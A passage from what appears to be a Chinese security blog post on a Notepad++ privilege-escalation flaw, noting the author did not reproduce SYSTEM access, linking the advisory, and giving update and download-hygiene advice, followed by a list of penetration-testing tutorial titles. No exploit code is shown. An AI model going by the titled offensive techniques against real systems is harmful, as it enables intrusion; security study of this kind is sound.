权限执行,没有复现出system系统权限,这里可能需要用到一个pochttps://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-9vx8-v79m-6m24结果:攻击者获得对系统的超级管理员控制权,可安装程序、修改数据或创建新账户。修复建议1、不要随意下载朋友 / 陌生人给你的exe文件安装包,尽量选择官网或者应用商店下载2、一定要定期清理自己下载的文件3、使用最新版的Notepad++,及时更新软件的版本往期推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等内网渗透,流量转发Linux内网渗透(2w字超详细)AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年06月24日
1,350 阅读
0 评论
0 点赞
1
...
4
5
6
7